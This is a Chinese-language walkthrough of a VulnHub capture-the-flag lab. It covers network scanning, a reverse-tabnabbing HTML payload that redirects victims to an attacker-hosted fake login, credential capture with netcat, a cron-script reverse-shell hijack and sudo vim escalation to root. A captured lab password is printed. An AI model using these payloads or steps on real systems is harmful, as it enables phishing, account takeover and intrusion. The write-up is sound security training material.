前期準備

靶機下載地址：https://www.vulnhub.com/entry/red-1,753/
kali：192.168.147.178
靶機：192.168.147.185

一、資訊收集

• 1、掃描同網段存活伺服器：

arp-scan -l

• 2、nmap進行埠掃描。

nmap -A -p 1-65535 192.168.11.137
nmap -sV -O 192.168.147.185 

發現80埠開啟http服務，22埠開啟ssh服務。

• 3、訪問80埠，收集頁面資訊。

發現是個登陸介面，可以註冊，我們先註冊登陸。

完成註冊後，登陸進入介面，發現介面中間有個輸入連結的輸入框。

隨便輸入一個進行測試，提交之後發現可以點選here。

點選here以後，發現跳到hao123主頁。我們檢視頁面原始碼。

檢視原始碼，發現站點上的此特定 URL 連結功能容易受到

二、漏洞攻擊

• 1、TABNabbing釣魚利用

符合該漏洞利用條件，我們製作釣魚頁面，先將login登陸介面拷貝到本地。（注：為什麼是拷貝index.php ，可以利用御劍掃描該網站，或者kali dirb http://192.168.147.185
）

• 2、惡意介面的製作 sain.html

<!DOCTYPE html>
<html>
<body>
    <script>
    	if(window.opener) window.opener.parent.location.replace('http://192.168.147.178:8000/text1.html');
    	if(window.opener  != window) window.opener.parent.location.replace('http://192.168.11.178:8000/text1.html');
    </script>
</body>
</html>

 

• 3、將製作的惡意介面和下載的index.php放到 /var/www/html，並且開啟 python3-http 服務，開 80 埠，和sain.html 中的埠區分開

開機8000埠監聽，nc -lvvp 8000 之後，在進行下列步驟。

稍等幾分鐘之後會獲取到監聽資訊，得到使用者名稱和密碼。

靶機中設定的隔幾分鐘就會用使用者登入，此時我們獲取了資料包
username=daniel
password=C@ughtm3napping123

三、ssh登陸

ssh [email protected]     #ssh登陸daniel嘗試，發現登陸成功

檢視使用者資訊：
可以看到 daniel 是管理員組的一部分。
使用 find 我們可以查詢任何我們可以使用命令訪問的有趣檔案
find / -group administrators -type f 2>/dev/nul

進入目錄檢視query.py指令碼內容，發現對訪問本地服務狀態進行錄入，不管成功與否都寫入site_status.txt檔案。猜測是個定時指令碼。

檢視site_status.txt，發現可能是2分鐘執行一次該指令碼。

四、提權

• 我們發現指令碼在adrian使用者下定時執行，我們嘗試獲取adrian許可權。所以我們在 /dev/shm 目錄中建立一個反向 shell bash 指令碼：

在query.py中加入執行該指令碼程式碼。

在攻擊機監聽1234埠，等會得到反彈shell。

發現可以再沒有在沒有密碼的情況下以 root 身份執行 vim ，獲取root許可權，那就直接寫入vim shell

sudo /usr/bin/vim -c ':!/bin/sh'  
sudo vim -c ':!/bin/sh'

兩個命令都可以獲取到root許可權。

參考了我關注的博主。